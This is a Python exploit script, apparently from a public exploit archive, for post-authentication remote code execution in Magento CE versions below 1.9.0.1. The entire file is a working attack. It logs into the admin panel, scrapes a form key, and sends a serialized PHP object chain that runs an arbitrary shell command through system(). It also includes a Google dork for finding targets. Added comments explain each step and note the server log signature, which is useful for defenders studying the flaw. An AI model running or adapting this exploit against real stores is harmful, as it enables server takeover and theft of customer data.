Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution : php/webapps/37811.py
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none
from hashlib import md5 | |
import sys | |
import re | |
import base64 | |
import mechanize | |
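def usage():
    """Print the command-line usage to stdout and exit.

    The script name is substituted into both ``%s`` slots; the original
    printed the format string unformatted, so the literal ``%s`` appeared
    in the help text. ``sys.exit()`` without an argument exits with status
    0, and callers never return from this function.
    """
    # Single-argument print() form behaves the same on Python 2 and 3.
    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
          % (sys.argv[0], sys.argv[0]))
    sys.exit()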
# Exit through usage() unless exactly <target> and <argument> were supplied.
if len(sys.argv) != 3:
    usage()
# Command-line args
target = sys.argv[1]  # base URL of the Magento admin login page
arg = sys.argv[2]     # the single string handed to php_function server-side
# Config.
# Admin credentials typed into the login form below; hard-coded for this run.
username = 'mah1ndra'
password = 'mah1ndra'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
# A PHP serialize()-format object graph (Zend_Log -> Zend_Log_Writer_Mail ->
# Zend_Config_Writer_Yaml -> Varien_Object, plus an empty Zend_Mail). The
# '\00' escapes are NUL bytes: PHP's serialize() wraps protected property
# names in "\0*\0". The two %d/%s pairs take len()/value of php_function and
# of arg, so each s:N: length prefix matches what unserialize() will check.
# NOTE(review): len() yields a byte count only because sys.argv is bytes on
# Python 2; a non-ASCII arg under Python 3 would give a wrong s:N: length.
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
# Every HTTP request below is routed through a proxy on localhost:8080 —
# presumably an interception proxy left on from debugging. If nothing is
# listening there, each br.open() fails; check before relying on this script.
br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
# Step 1: authenticate through the first form on the target page.
request = br.open(target)
br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
# Step 2: scrape ajaxBlockUrl and FORM_KEY from the post-login page.
# There is no None check: if the login failed, neither regex matches and
# .group(1) raises AttributeError instead of a readable error.
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
# Step 3: POST the form key to the orders-tab block; the response embeds an
# image src ending in "?ga=", and the URL before it is the endpoint used next.
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
# Step 4: base64-encode the serialized payload and compute h = md5(payload +
# install_date) — this is why install_date above must match the server's
# local.xml exactly. In access logs the final request is a GET to that
# endpoint with a long base64 "ga=" value and a 32-hex "h=" value.
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
# Step 5: send it. On an HTTP or URL error the response body is printed
# (Python 2 print statement); on success nothing is printed — the script
# does not capture or display any output from the server.
try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    print e.read()